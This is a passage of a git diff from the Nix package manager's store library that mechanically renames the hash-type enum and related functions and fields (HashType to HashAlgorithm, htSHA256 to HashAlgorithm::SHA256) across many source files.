LocalDerivationGoal::registerOutputs() rewriteOutput(outputRewrites); /* FIXME optimize and deduplicate with addToStore */ std::string oldHashPart { scratchPath->hashPart() }; - HashModuloSink caSink { outputHash.hashType, oldHashPart }; + HashModuloSink caSink {outputHash.hashAlgo, oldHashPart }; std::visit(overloaded { [&](const TextIngestionMethod &) { readFile(actualPath, caSink); @@ -2511,7 +2511,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string(newInfo0.path.hashPart())}}); } - HashResult narHashAndSize = hashPath(htSHA256, actualPath); + HashResult narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); newInfo0.narHash = narHashAndSize.first; newInfo0.narSize = narHashAndSize.second; @@ -2531,7 +2531,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() std::string { scratchPath->hashPart() }, std::string { requiredFinalPath.hashPart() }); rewriteOutput(outputRewrites); - auto narHashAndSize = hashPath(htSHA256, actualPath); + auto narHashAndSize = hashPath(HashAlgorithm::SHA256, actualPath); ValidPathInfo newInfo0 { requiredFinalPath, narHashAndSize.first }; newInfo0.narSize = narHashAndSize.second; auto refs = rewriteRefs(); @@ -2546,7 +2546,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() auto newInfo0 = newInfoFromCA(DerivationOutput::CAFloating { .method = dof.ca.method, - .hashType = wanted.type, + .hashAlgo = wanted.algo, }); /* Check wanted hash */ @@ -2583,7 +2583,7 @@ SingleDrvOutputs LocalDerivationGoal::registerOutputs() [&](const DerivationOutput::Impure & doi) { return newInfoFromCA(DerivationOutput::CAFloating { .method = doi.method, - .hashType = doi.hashType, + .hashAlgo = doi.hashAlgo, }); }, @@ -2945,7 +2945,7 @@ StorePath LocalDerivationGoal::makeFallbackPath(OutputNameView outputName) { return worker.store.makeStorePath( "rewrite:" + std::string(drvPath.to_string()) + ":name:" + std::string(outputName), - Hash(htSHA256), outputPathName(drv->name, outputName)); + Hash(HashAlgorithm::SHA256), outputPathName(drv->name, outputName)); } @@ -2953,7 +2953,7 @@ StorePath LocalDerivationGoal::makeFallbackPath(const StorePath & path) { return worker.store.makeStorePath( "rewrite:" + std::string(drvPath.to_string()) + ":" + std::string(path.to_string()), - Hash(htSHA256), path.name()); + Hash(HashAlgorithm::SHA256), path.name()); } diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 01f52e7ab..9b8c36286 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -519,8 +519,8 @@ bool Worker::pathContentsGood(const StorePath & path) if (!pathExists(store.printStorePath(path))) res = false; else { - HashResult current = hashPath(info->narHash.type, store.printStorePath(path)); - Hash nullHash(htSHA256); + HashResult current = hashPath(info->narHash.algo, store.printStorePath(path)); + Hash nullHash(HashAlgorithm::SHA256); res = info->narHash == nullHash || info->narHash == current.first; } pathContentsGoodCache.insert_or_assign(path, res); diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index 357800333..2086bd0b9 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -63,9 +63,9 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) for (auto hashedMirror : settings.hashedMirrors.get()) try { if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/'; - std::optional ht = parseHashTypeOpt(getAttr("outputHashAlgo")); + std::optional ht = parseHashAlgoOpt(getAttr("outputHashAlgo")); Hash h = newHashAllowEmpty(getAttr("outputHash"), ht); - fetch(hashedMirror + printHashType(h.type) + "/" + h.to_string(HashFormat::Base16, false)); + fetch(hashedMirror + printHashAlgo(h.algo) + "/" + h.to_string(HashFormat::Base16, false)); return; } catch (Error & e) { debug(e.what()); diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc index a5f7cdf81..de8194f73 100644 --- a/src/libstore/content-address.cc +++ b/src/libstore/content-address.cc @@ -38,14 +38,14 @@ ContentAddressMethod ContentAddressMethod::parsePrefix(std::string_view & m) return FileIngestionMethod::Flat; } -std::string ContentAddressMethod::render(HashType ht) const +std::string ContentAddressMethod::render(HashAlgorithm ha) const { return std::visit(overloaded { [&](const TextIngestionMethod & th) { - return std::string{"text:"} + printHashType(ht); + return std::string{"text:"} + printHashAlgo(ha); }, [&](const FileIngestionMethod & fim) { - return "fixed:" + makeFileIngestionPrefix(fim) + printHashType(ht); + return "fixed:" + makeFileIngestionPrefix(fim) + printHashAlgo(ha); } }, raw); } @@ -67,7 +67,7 @@ std::string ContentAddress::render() const /** * Parses content address strings up to the hash. */ -static std::pair parseContentAddressMethodPrefix(std::string_view & rest) +static std::pair parseContentAddressMethodPrefix(std::string_view & rest) { std::string_view wholeInput { rest }; @@ -83,27 +83,27 @@ static std::pair parseContentAddressMethodPrefix auto hashTypeRaw = splitPrefixTo(rest, ':'); if (!hashTypeRaw) throw UsageError("content address hash must be in form ':', but found: %s", wholeInput); - HashType hashType = parseHashType(*hashTypeRaw); - return hashType; + HashAlgorithm hashAlgo = parseHashAlgo(*hashTypeRaw); + return hashAlgo; }; // Switch on prefix if (prefix == "text") { // No parsing of the ingestion method, "text" only support flat. - HashType hashType = parseHashType_(); + HashAlgorithm hashAlgo = parseHashType_(); return { TextIngestionMethod {}, - std::move(hashType), + std::move(hashAlgo), }; } else if (prefix == "fixed") { // Parse method auto method = FileIngestionMethod::Flat; if (splitPrefix(rest, "r:")) method = FileIngestionMethod::Recursive; - HashType hashType = parseHashType_(); + HashAlgorithm hashAlgo = parseHashType_(); return { std::move(method), - std::move(hashType), + std::move(hashAlgo), }; } else throw UsageError("content address prefix '%s' is unrecognized. Recogonized prefixes are 'text' or 'fixed'", prefix); @@ -113,15 +113,15 @@ ContentAddress ContentAddress::parse(std::string_view rawCa) { auto rest = rawCa; - auto [caMethod, hashType] = parseContentAddressMethodPrefix(rest); + auto [caMethod, hashAlgo] = parseContentAddressMethodPrefix(rest); return ContentAddress { .method = std::move(caMethod), - .hash = Hash::parseNonSRIUnprefixed(rest, hashType), + .hash = Hash::parseNonSRIUnprefixed(rest, hashAlgo), }; } -std::pair ContentAddressMethod::parse(std::string_view caMethod) +std::pair ContentAddressMethod::parse(std::string_view caMethod) { std::string asPrefix = std::string{caMethod} + ":"; // parseContentAddressMethodPrefix takes its argument by reference @@ -144,7 +144,7 @@ std::string renderContentAddress(std::optional ca) std::string ContentAddress::printMethodAlgo() const { return method.renderPrefix() - + printHashType(hash.type); + + printHashAlgo(hash.algo); } bool StoreReferences::empty() const diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh index bdb558907..05234da38 100644 --- a/src/libstore/content-address.hh +++ b/src/libstore/content-address.hh @@ -94,7 +94,7 @@ struct ContentAddressMethod /** * Parse a content addressing method and hash type. */ - static std::pair parse(std::string_view rawCaMethod); + static std::pair parse(std::string_view rawCaMethod); /** * Render a content addressing method and hash type in a @@ -102,7 +102,7 @@ struct ContentAddressMethod * * The rough inverse of `parse()`. */ - std::string render(HashType ht) const; + std::string render(HashAlgorithm ha) const; }; diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index be9b0b0d3..530b1a178 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -400,22 +400,22 @@ static void performOp(TunnelLogger * logger, ref store, logger->startWork(); auto pathInfo = [&]() { // NB: FramedSource must be out of scope before logger->stopWork(); - auto [contentAddressMethod, hashType_] = ContentAddressMethod::parse(camStr); - auto hashType = hashType_; // work around clang bug + auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parse(camStr); + auto hashAlgo = hashAlgo_; // work around clang bug FramedSource source(from); // TODO this is essentially RemoteStore::addCAToStore. Move it up to Store. return std::visit(overloaded { [&](const TextIngestionMethod &) { - if (hashType != htSHA256) + if (hashAlgo != HashAlgorithm::SHA256) throw UnimplementedError("When adding text-hashed data called '%s', only SHA-256 is supported but '%s' was given", - name, printHashType(hashType)); + name, printHashAlgo(hashAlgo)); // We could stream this by changing Store std::string contents = source.drain(); auto path = store->addTextToStore(name, contents, refs, repair); return store->queryPathInfo(path); }, [&](const FileIngestionMethod & fim) { - auto path = store->addToStoreFromDump(source, name, fim, hashType, repair, refs); + auto path = store->addToStoreFromDump(source, name, fim, hashAlgo, repair, refs); return store->queryPathInfo(path); }, }, contentAddressMethod.raw); @@ -424,7 +424,7 @@ static void performOp(TunnelLogger * logger, ref store, WorkerProto::Serialise::write(*store, wconn, *pathInfo); } else { - HashType hashAlgo; + HashAlgorithm hashAlgo; std::string baseName; FileIngestionMethod method; { @@ -440,7 +440,7 @@ static void performOp(TunnelLogger * logger, ref store, hashAlgoRaw = "sha256"; method = FileIngestionMethod::Recursive; } - hashAlgo = parseHashType(hashAlgoRaw); + hashAlgo = parseHashAlgo(hashAlgoRaw); } auto dumpSource = sinkToSource([&](Sink & saved) { @@ -883,7 +883,7 @@ static void performOp(TunnelLogger * logger, ref store, bool repair, dontCheckSigs; auto path = store->parseStorePath(readString(from)); auto deriver = readString(from); - auto narHash = Hash::parseAny(readString(from), htSHA256); + auto narHash = Hash::parseAny(readString(from), HashAlgorithm::SHA256); ValidPathInfo info { path, narHash }; if (deriver != "") info.deriver = store->parseStorePath(deriver); diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc index dd87203b8..c68631c1a 100644 --- a/src/libstore/derivations.cc +++ b/src/libstore/derivations.cc @@ -215,25 +215,25 @@ static StringSet parseStrings(std::istream & str, bool arePaths) static DerivationOutput parseDerivationOutput( const StoreDirConfig & store, - std::string_view pathS, std::string_view hashAlgo, std::string_view hashS, + std::string_view pathS, std::string_view hashAlgoStr, std::string_view hashS, const ExperimentalFeatureSettings & xpSettings) { - if (hashAlgo != "") { - ContentAddressMethod method = ContentAddressMethod::parsePrefix(hashAlgo); + if (hashAlgoStr != "") { + ContentAddressMethod method = ContentAddressMethod::parsePrefix(hashAlgoStr); if (method == TextIngestionMethod {}) xpSettings.require(Xp::DynamicDerivations); - const auto hashType = parseHashType(hashAlgo); + const auto hashAlgo = parseHashAlgo(hashAlgoStr); if (hashS == "impure") { xpSettings.require(Xp::ImpureDerivations); if (pathS != "") throw FormatError("impure derivation output should not specify output path"); return DerivationOutput::Impure { .method = std::move(method), - .hashType = std::move(hashType), + .hashAlgo = std::move(hashAlgo), }; } else if (hashS != "") { validatePath(pathS); - auto hash = Hash::parseNonSRIUnprefixed(hashS, hashType); + auto hash = Hash::parseNonSRIUnprefixed(hashS, hashAlgo); return DerivationOutput::CAFixed { .ca = ContentAddress { .method = std::move(method), @@ -246,7 +246,7 @@ static DerivationOutput parseDerivationOutput( throw FormatError("content-addressed derivation output should not specify output path"); return DerivationOutput::CAFloating { .method = std::move(method), - .hashType = std::move(hashType), + .hashAlgo = std::move(hashAlgo), }; } } else { @@ -547,7 +547,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs, }, [&](const DerivationOutput::CAFloating & dof) { s += ','; printUnquotedString(s, ""); - s += ','; printUnquotedString(s, dof.method.renderPrefix() + printHashType(dof.hashType)); + s += ','; printUnquotedString(s, dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo)); s += ','; printUnquotedString(s, ""); }, [&](const DerivationOutput::Deferred &) { @@ -558,7 +558,7 @@ std::string Derivation::unparse(const StoreDirConfig & store, bool maskOutputs, [&](const DerivationOutput::Impure & doi) { // FIXME s += ','; printUnquotedString(s, ""); - s += ','; printUnquotedString(s, doi.method.renderPrefix() + printHashType(doi.hashType)); + s += ','; printUnquotedString(s, doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo)); s += ','; printUnquotedString(s, "impure"); } }, i.second.raw); @@ -631,7 +631,7 @@ DerivationType BasicDerivation::type() const floatingCAOutputs, deferredIAOutputs, impureOutputs; - std::optional floatingHashType; + std::optional floatingHashAlgo; for (auto & i : outputs) { std::visit(overloaded { @@ -643,10 +643,10 @@ DerivationType BasicDerivation::type() const }, [&](const DerivationOutput::CAFloating & dof) { floatingCAOutputs.insert(i.first); - if (!floatingHashType) { - floatingHashType = dof.hashType; + if (!floatingHashAlgo) { + floatingHashAlgo = dof.hashAlgo; } else { - if (*floatingHashType != dof.hashType) + if (*floatingHashAlgo != dof.hashAlgo) throw Error("all floating outputs must use the same hash type"); } }, @@ -774,7 +774,7 @@ DrvHash hashDerivationModulo(Store & store, const Derivation & drv, bool maskOut std::map outputHashes; for (const auto & i : drv.outputs) { auto & dof = std::get(i.second.raw); - auto hash = hashString(htSHA256, "fixed:out:" + auto hash = hashString(HashAlgorithm::SHA256, "fixed:out:" + dof.ca.printMethodAlgo() + ":" + dof.ca.hash.to_string(HashFormat::Base16, false) + ":" + store.printStorePath(dof.path(store, drv.name, i.first))); @@ -825,7 +825,7 @@ DrvHash hashDerivationModulo(Store & store, const Derivation & drv, bool maskOut } } - auto hash = hashString(htSHA256, drv.unparse(store, maskOutputs, &inputs2)); + auto hash = hashString(HashAlgorithm::SHA256, drv.unparse(store, maskOutputs, &inputs2)); std::map outputHashes; for (const auto & [outputName, _] : drv.outputs) { @@ -930,7 +930,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva }, [&](const DerivationOutput::CAFloating & dof) { out << "" - << (dof.method.renderPrefix() + printHashType(dof.hashType)) + << (dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo)) << ""; }, [&](const DerivationOutput::Deferred &) { @@ -940,7 +940,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva }, [&](const DerivationOutput::Impure & doi) { out << "" - << (doi.method.renderPrefix() + printHashType(doi.hashType)) + << (doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo)) << "impure"; }, }, i.second.raw); @@ -958,7 +958,7 @@ void writeDerivation(Sink & out, const StoreDirConfig & store, const BasicDeriva std::string hashPlaceholder(const OutputNameView outputName) { // FIXME: memoize? - return "/" + hashString(htSHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Base32, false); + return "/" + hashString(HashAlgorithm::SHA256, concatStrings("nix-output:", outputName)).to_string(HashFormat::Base32, false); } @@ -1150,7 +1150,7 @@ void Derivation::checkInvariants(Store & store, const StorePath & drvPath) const } -const Hash impureOutputHash = hashString(htSHA256, "impure"); +const Hash impureOutputHash = hashString(HashAlgorithm::SHA256, "impure"); nlohmann::json DerivationOutput::toJSON( const StoreDirConfig & store, std::string_view drvName, OutputNameView outputName) const @@ -1167,11 +1167,11 @@ nlohmann::json DerivationOutput::toJSON( // FIXME print refs? }, [&](const DerivationOutput::CAFloating & dof) { - res["hashAlgo"] = dof.method.renderPrefix() + printHashType(dof.hashType); + res["hashAlgo"] = dof.method.renderPrefix() + printHashAlgo(dof.hashAlgo); }, [&](const DerivationOutput::Deferred &) {}, [&](const DerivationOutput::Impure & doi) { - res["hashAlgo"] = doi.method.renderPrefix() + printHashType(doi.hashType); + res["hashAlgo"] = doi.method.renderPrefix() + printHashAlgo(doi.hashAlgo); res["impure"] = true; }, }, raw); @@ -1191,15 +1191,15 @@ DerivationOutput DerivationOutput::fromJSON( for (const auto & [key, _] : json) keys.insert(key); - auto methodAlgo = [&]() -> std::pair { - std::string hashAlgo = json["hashAlgo"]; + auto methodAlgo = [&]() -> std::pair { + std::string hashAlgoStr = json["hashAlgo"]; // remaining to parse, will be mutated by parsers - std::string_view s = hashAlgo; + std::string_view s = hashAlgoStr; ContentAddressMethod method = ContentAddressMethod::parsePrefix(s); if (method == TextIngestionMethod {}) xpSettings.require(Xp::DynamicDerivations); - auto hashType = parseHashType(s); - return { std::move(method), std::move(hashType) }; + auto hashAlgo = parseHashAlgo(s); + return { std::move(method), std::move(hashAlgo) }; }; if (keys == (std::set { "path" })) { @@ -1209,11 +1209,11 @@ DerivationOutput DerivationOutput::fromJSON( } else if (keys == (std::set { "path", "hashAlgo", "hash" })) { - auto [method, hashType] = methodAlgo(); + auto [method, hashAlgo] = methodAlgo(); auto dof = DerivationOutput::CAFixed { .ca = ContentAddress { .method = std::move(method), - .hash = Hash::parseNonSRIUnprefixed((std::string) json["hash"], hashType), + .hash = Hash::parseNonSRIUnprefixed((std::string) json["hash"], hashAlgo), }, }; if (dof.path(store, drvName, outputName) != store.parseStorePath((std::string) json["path"])) @@ -1223,10 +1223,10 @@ DerivationOutput DerivationOutput::fromJSON( else if (keys == (std::set { "hashAlgo" })) { xpSettings.require(Xp::CaDerivations); - auto [method, hashType] = methodAlgo(); + auto [method, hashAlgo] = methodAlgo(); return DerivationOutput::CAFloating { .method = std::move(method), - .hashType = std::move(hashType), + .hashAlgo = std::move(hashAlgo), }; } @@ -1236,10 +1236,10 @@ DerivationOutput DerivationOutput::fromJSON( else if (keys == (std::set { "hashAlgo", "impure" })) { xpSettings.require(Xp::ImpureDerivations); - auto [method, hashType] = methodAlgo(); + auto [method, hashAlgo] = methodAlgo(); return DerivationOutput::Impure { .method = std::move(method), - .hashType = hashType, + .hashAlgo = hashAlgo, }; } diff --git a/src/libstore/derivations.hh b/src/libstore/derivations.hh index 219e8e7d7..290abedcf 100644 --- a/src/libstore/derivations.hh +++ b/src/libstore/derivations.hh @@ -75,9 +75,9 @@ struct DerivationOutput /** * How the serialization will be hashed */ - HashType hashType; + HashAlgorithm hashAlgo; - GENERATE_CMP(CAFloating, me->method, me->hashType); + GENERATE_CMP(CAFloating, me->method, me->hashAlgo); }; /** @@ -102,9 +102,9 @@ struct DerivationOutput /** * How the serialization will be hashed */ - HashType hashType; + HashAlgorithm hashAlgo; - GENERATE_CMP(Impure, me->method, me->hashType); + GENERATE_CMP(Impure, me->method, me->hashAlgo); }; typedef std::variant< diff --git a/src/libstore/downstream-placeholder.cc b/src/libstore/downstream-placeholder.cc index ca9f7476e..10df37fa4 100644 --- a/src/libstore/downstream-placeholder.cc +++ b/src/libstore/downstream-placeholder.cc @@ -19,7 +19,7 @@ DownstreamPlaceholder DownstreamPlaceholder::unknownCaOutput( auto drvName = drvNameWithExtension.substr(0, drvNameWithExtension.size() - 4); auto clearText = "nix-upstream-output:" + std::string { drvPath.hashPart() } + ":" + outputPathName(drvName, outputName); return DownstreamPlaceholder { - hashString(htSHA256, clearText) + hashString(HashAlgorithm::SHA256, clearText) }; } @@ -34,7 +34,7 @@ DownstreamPlaceholder DownstreamPlaceholder::unknownDerivation( + compressed.to_string(HashFormat::Base32, false) + ":" + std::string { outputName }; return DownstreamPlaceholder { - hashString(htSHA256, clearText) + hashString(HashAlgorithm::SHA256, clearText) }; } diff --git a/src/libstore/export-import.cc b/src/libstore/export-import.cc index 52130f8f6..48718ef84 100644 --- a/src/libstore/export-import.cc +++ b/src/libstore/export-import.cc @@ -30,7 +30,7 @@ void Store::exportPath(const StorePath & path, Sink & sink) { auto info = queryPathInfo(path); - HashSink hashSink(htSHA256); + HashSink hashSink(HashAlgorithm::SHA256); TeeSink teeSink(sink, hashSink); narFromPath(path, teeSink); @@ -39,7 +39,7 @@ void Store::exportPath(const StorePath & path, Sink & sink) filesystem corruption from spreading to other machines. Don't complain if the stored hash is zero (unknown). */ Hash hash = hashSink.currentHash().first; - if (hash != info->narHash && info->narHash != Hash(info->narHash.type)) + if (hash != info->narHash && info->narHash != Hash(info->narHash.algo)) throw Error("hash of path '%s' has changed from '%s' to '%s'!", printStorePath(path), info->narHash.to_string(HashFormat::Base32, true), hash.to_string(HashFormat::Base32, true)); @@ -79,7 +79,7 @@ StorePaths Store::importPaths(Source & source, CheckSigsFlag checkSigs) auto references = CommonProto::Serialise::read(*this, CommonProto::ReadConn { .from = source }); auto deriver = readString(source); - auto narHash = hashString(htSHA256, saved.s); + auto narHash = hashString(HashAlgorithm::SHA256, saved.s); ValidPathInfo info { path, narHash }; if (deriver != "") diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index 93fa60682..5c413aa77 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -50,7 +50,7 @@ static void makeSymlink(const Path & link, const Path & target) void LocalStore::addIndirectRoot(const Path & path) { - std::string hash = hashString(htSHA1, path).to_string(HashFormat::Base32, false); + std::string hash = hashString(HashAlgorithm::SHA1, path).to_string(HashFormat::Base32, false); Path realRoot = canonPath(fmt("%1%/%2%/auto/%3%", stateDir, gcRootsDir, hash)); makeSymlink(realRoot, path); } diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 731457354..fb1580dd6 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -267,13 +267,13 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor { unsupported("queryPathFromHashPart"); } StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashType hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override { unsupported("addToStore"); } StorePath addTextToStore( diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index c8962f574..ef7dd7985 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -955,7 +955,7 @@ void LocalStore::registerValidPaths(const ValidPathInfos & infos) StorePathSet paths; for (auto & [_, i] : infos) { - assert(i.narHash.type == htSHA256); + assert(i.narHash.algo == HashAlgorithm::SHA256); if (isValidPath_(*state, i.path)) updatePathInfo(*state, i); else @@ -1069,7 +1069,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, /* While restoring the path from the NAR, compute the hash of the NAR. */ - HashSink hashSink(htSHA256); + HashSink hashSink(HashAlgorithm::SHA256); TeeSource wrapperSource { source, hashSink }; @@ -1090,7 +1090,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, auto & specified = *info.ca; auto actualHash = hashCAPath( specified.method, - specified.hash.type, + specified.hash.algo, info.path ); if (specified.hash != actualHash.hash) { @@ -1116,7 +1116,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) { /* For computing the store path. */ auto hashSink = std::make_unique(hashAlgo); @@ -1220,8 +1220,8 @@ StorePath LocalStore::addToStoreFromDump(Source & source0, std::string_view name /* For computing the nar hash. In recursive SHA-256 mode, this is the same as the store hash, so no need to do it again. */ auto narHash = std::pair { hash, size }; - if (method != FileIngestionMethod::Recursive || hashAlgo != htSHA256) { - HashSink narSink { htSHA256 }; + if (method != FileIngestionMethod::Recursive || hashAlgo != HashAlgorithm::SHA256) { + HashSink narSink { HashAlgorithm::SHA256 }; dumpPath(realPath, narSink); narHash = narSink.finish(); } @@ -1252,7 +1252,7 @@ StorePath LocalStore::addTextToStore( std::string_view s, const StorePathSet & references, RepairFlag repair) { - auto hash = hashString(htSHA256, s); + auto hash = hashString(HashAlgorithm::SHA256, s); auto dstPath = makeTextPath(name, TextInfo { .hash = hash, .references = references, @@ -1278,7 +1278,7 @@ StorePath LocalStore::addTextToStore( StringSink sink; dumpString(s, sink); - auto narHash = hashString(htSHA256, sink.s); + auto narHash = hashString(HashAlgorithm::SHA256, sink.s); optimisePath(realPath, repair); @@ -1389,7 +1389,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) for (auto & link : readDirectory(linksDir)) { printMsg(lvlTalkative, "checking contents of '%s'", link.name); Path linkPath = linksDir + "/" + link.name; - std::string hash = hashPath(htSHA256, linkPath).first.to_string(HashFormat::Base32, false); + std::string hash = hashPath(HashAlgorithm::SHA256, linkPath).first.to_string(HashFormat::Base32, false); if (hash != link.name) { printError("link '%s' was modified! expected hash '%s', got '%s'", linkPath, link.name, hash); @@ -1406,7 +1406,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) printInfo("checking store hashes..."); - Hash nullHash(htSHA256); + Hash nullHash(HashAlgorithm::SHA256); for (auto & i : validPaths) { try { @@ -1415,7 +1415,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair) /* Check the content hash (optionally - slow). */ printMsg(lvlTalkative, "checking contents of '%s'", printStorePath(i)); - auto hashSink = HashSink(info->narHash.type); + auto hashSink = HashSink(info->narHash.algo); dumpPath(Store::toRealPath(i), hashSink); auto current = hashSink.finish(); @@ -1697,20 +1697,20 @@ void LocalStore::queryRealisationUncached(const DrvOutput & id, } ContentAddress LocalStore::hashCAPath( - const ContentAddressMethod & method, const HashType & hashType, + const ContentAddressMethod & method, const HashAlgorithm & hashAlgo, const StorePath & path) { - return hashCAPath(method, hashType, Store::toRealPath(path), path.hashPart()); + return hashCAPath(method, hashAlgo, Store::toRealPath(path), path.hashPart()); } ContentAddress LocalStore::hashCAPath( const ContentAddressMethod & method, - const HashType & hashType, + const HashAlgorithm & hashAlgo, const Path & path, const std::string_view pathHash ) { - HashModuloSink caSink ( hashType, std::string(pathHash) ); + HashModuloSink caSink ( hashAlgo, std::string(pathHash) ); std::visit(overloaded { [&](const TextIngestionMethod &) { readFile(path, caSink); diff --git a/src/libstore/local-store.hh b/src/libstore/local-store.hh index 8f0ffd2a2..ee605b5a2 100644 --- a/src/libstore/local-store.hh +++ b/src/libstore/local-store.hh @@ -178,7 +178,7 @@ public: RepairFlag repair, CheckSigsFlag checkSigs) override; StorePath addToStoreFromDump(Source & dump, std::string_view name, - FileIngestionMethod method, HashType hashAlgo, RepairFlag repair, const StorePathSet & references) override; + FileIngestionMethod method, HashAlgorithm hashAlgo, RepairFlag repair, const StorePathSet & references) override; StorePath addTextToStore( std::string_view name, @@ -353,12 +353,12 @@ private: // XXX: Make a generic `Store` method ContentAddress hashCAPath( const ContentAddressMethod & method, - const HashType & hashType, + const HashAlgorithm & hashAlgo, const StorePath & path); ContentAddress hashCAPath( const ContentAddressMethod & method, - const HashType & hashType, + const HashAlgorithm & hashAlgo, const Path & path, const std::string_view pathHash ); diff --git a/src/libstore/make-content-addressed.cc b/src/libstore/make-content-addressed.cc index 253609ed2..170fe67b9 100644 --- a/src/libstore/make-content-addressed.cc +++ b/src/libstore/make-content-addressed.cc @@ -43,7 +43,7 @@ std::map makeContentAddressed( sink.s = rewriteStrings(sink.s, rewrites); - HashModuloSink hashModuloSink(htSHA256, oldHashPart); + HashModuloSink hashModuloSink(HashAlgorithm::SHA256, oldHashPart); hashModuloSink(sink.s); auto narModuloHash = hashModuloSink.finish().first; @@ -66,7 +66,7 @@ std::map makeContentAddressed( rsink2(sink.s); rsink2.flush(); - info.narHash = hashString(htSHA256, sink2.s); + info.narHash = hashString(HashAlgorithm::SHA256, sink2.s); info.narSize = sink.s.size(); StringSource source(sink2.s); diff --git a/src/libstore/nar-info.cc b/src/libstore/nar-info.cc index 1060a6c8b..25e2a7d7b 100644 --- a/src/libstore/nar-info.cc +++ b/src/libstore/nar-info.cc @@ -113,10 +113,10 @@ std::string NarInfo::to_string(const Store & store) const res += "URL: " + url + "\n"; assert(compression != ""); res += "Compression: " + compression + "\n"; - assert(fileHash && fileHash->type == htSHA256); + assert(fileHash && fileHash->algo == HashAlgorithm::SHA256); res += "FileHash: " + fileHash->to_string(HashFormat::Base32, true) + "\n"; res += "FileSize: " + std::to_string(fileSize) + "\n"; - assert(narHash.type == htSHA256); + assert(narHash.algo == HashAlgorithm::SHA256); res += "NarHash: " + narHash.to_string(HashFormat::Base32, true) + "\n"; res += "NarSize: " + std::to_string(narSize) + "\n"; diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc index 0fa977545..cadf88347 100644 --- a/src/libstore/optimise-store.cc +++ b/src/libstore/optimise-store.cc @@ -146,7 +146,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, Also note that if `path' is a symlink, then we're hashing the contents of the symlink (i.e. the result of readlink()), not the contents of the target (which may not even exist). */ - Hash hash = hashPath(htSHA256, path).first; + Hash hash = hashPath(HashAlgorithm::SHA256, path).first; debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Base32, true)); /* Check if this is a known hash. */ @@ -156,7 +156,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats, if (pathExists(linkPath)) { auto stLink = lstat(linkPath); if (st.st_size != stLink.st_size - || (repair && hash != hashPath(htSHA256, linkPath).first)) + || (repair && hash != hashPath(HashAlgorithm::SHA256, linkPath).first)) { // XXX: Consider overwriting linkPath with our valid version. warn("removing corrupted link '%s'", linkPath); diff --git a/src/libstore/path-references.cc b/src/libstore/path-references.cc index 274b596c0..15f52ec9d 100644 --- a/src/libstore/path-references.cc +++ b/src/libstore/path-references.cc @@ -49,7 +49,7 @@ std::pair scanForReferences( const std::string & path, const StorePathSet & refs) { - HashSink hashSink { htSHA256 }; + HashSink hashSink { HashAlgorithm::SHA256 }; auto found = scanForReferences(hashSink, path, refs); auto hash = hashSink.finish(); return std::pair(found, hash); diff --git a/src/libstore/path.cc b/src/libstore/path.cc index 69f6d7356..d5257c939 100644 --- a/src/libstore/path.cc +++ b/src/libstore/path.cc @@ -49,7 +49,7 @@ StorePath StorePath::dummy("ffffffffffffffffffffffffffffffff-x"); StorePath StorePath::random(std::string_view name) { - Hash hash(htSHA1); + Hash hash(HashAlgorithm::SHA1); randombytes_buf(hash.hash, hash.hashSize); return StorePath(hash, name); } diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 3d3919882..cc26c2a94 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -417,12 +417,12 @@ std::optional RemoteStore::queryPathFromHashPart(const std::string & ref RemoteStore::addCAToStore( - Source & dump, - std::string_view name, - ContentAddressMethod caMethod, - HashType hashType, - const StorePathSet & references, - RepairFlag 